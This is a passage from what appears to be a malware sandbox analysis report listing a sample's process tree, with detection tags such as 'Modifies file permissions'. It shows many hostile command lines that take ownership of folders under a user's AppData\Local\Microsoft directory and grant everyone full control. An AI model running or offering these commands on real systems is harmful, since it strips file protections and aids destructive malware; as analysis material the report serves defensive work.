C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~ && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~ /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~ && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~ /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~ /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~ && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~ /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~ /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FUHIK2RW && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FUHIK2RW /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FUHIK2RW3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\OM66BHWE && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\OM66BHWE /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\OM66BHWE3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Q4438GAN && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Q4438GAN /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Q4438GAN3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\R627XHFP && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\R627XHFP /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\R627XHFP3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\SP885UOB && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\SP885UOB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\SP885UOB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\U8F4PBMO && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\U8F4PBMO /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\U8F4PBMO3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Y7RLQ0C0 && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Y7RLQ0C0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Y7RLQ0C03⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YPLB435F && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YPLB435F /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YPLB435F3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\anyweax && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\anyweax /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\anyweax3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440 && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-28451624403⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290 && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin97280602903⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player && icacls C:\Users\Admin\AppData\Local\Microsoft\Media Player /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists && icacls C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US && icacls C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000582D && icacls C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000582D /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000582D3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office && icacls C:\Users\Admin\AppData\Local\Microsoft\Office /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\14.0 && icacls C:\Users\Admin\AppData\Local\Microsoft\Office\14.0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\14.03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office\14.0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove && icacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System && icacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User && icacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\PlayReady && icacls C:\Users\Admin\AppData\Local\Microsoft\PlayReady /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\PlayReady3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\PlayReady /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE53⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024090320240904 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024090320240904 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist0120240903202409043⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024090320240904 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE53⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4DY23DRT && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4DY23DRT /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4DY23DRT3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\98Y29LGS && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\98Y29LGS /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\98Y29LGS3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BQQODH7V && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BQQODH7V /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BQQODH7V3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CUMHXU73 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CUMHXU73 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CUMHXU733⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q4648X1K && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q4648X1K /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q4648X1K3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROLMKJ86 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROLMKJ86 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROLMKJ863⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T072YXIW && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T072YXIW /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T072YXIW3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH53⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Mail /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new /grant everyone:(f)2⤵
-
